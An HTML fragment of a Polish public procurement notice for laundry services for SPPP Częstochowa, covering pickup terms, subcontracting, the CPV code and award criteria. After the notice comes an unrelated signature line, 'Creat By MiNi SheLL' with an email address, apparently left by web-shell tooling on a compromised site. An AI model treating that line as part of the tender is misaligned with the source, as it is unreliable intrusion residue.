<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Świadczenie kompleksowej usługi pralniczej dla SPPP Częstochowa  2. Szczegółowy opis przedmiotu zamówienia, szacowane ilość prań dla poszczególnych zadań oraz miejsca realizacji usług zostały wskazane w załączniku nr 2 do SIWZ- formularz cenowy.
- Odbiór brudnych przedmiotów, przywóz czystych odbywać się będzie na koszt Wykonawcy
- Odbiór brudnych przedmiotów odbywać się będzie po wcześniejszym zgłoszeniu telefonicznym (w terminie maksymalnie 3 dni roboczych od dnia otrzymania zgłoszenia).
-Odbiór brudnych przedmiotów oraz przywóz czystych odbywać się będzie w terminach wskazanych w załączniku nr 2 do SIWZ-formularz cenowy- dla danego zadania na które składana będzie oferta. 
- Podstawą przekazania prania będzie zlecenie (wzór stanowi załącznik nr 4 do SIWZ)
- Zabezpieczenie czystej bielizny poprzez pakowanie w worki foliowe
- Transport bielizny i przedmiotów mundurowych samochodami posiadającymi wydzieloną część  brudną oraz czystą; mytymi                  i dezynfekowanymi z odpowiednią częstotliwością 
- Usługa pralnicza winna być świadczona zgodnie z obowiązującymi wymogami sanitarnymi i higienicznymi, jakie nakładane są na procesy prania.
3. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom. Zamawiający wymaga od Wykonawcy  oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia.                   4. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania jakie części zamówienia będzie realizował przy jego/ich udziale.
	UWAGA: Ilości usług określonych w załączniku nr 2 - formularz cenowy są ilościami szacunkowymi. Określona ilość danego asortymentu może ulec zmianie w trakcie realizacji umowy ze względu na zmniejszone bądź zwiększone zapotrzebowanie w zakresie przedmiotu zamówienia, którego Zamawiający w chwili rozpoczęcia postępowania nie mógł precyzyjnie przewidzieć. Maksymalna wartość umowy będzie opiewać na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia dla każdego zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin odbioru brudnych przedmiotów po zgłoszeniu telefonicznym przez zlecającego usługę - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com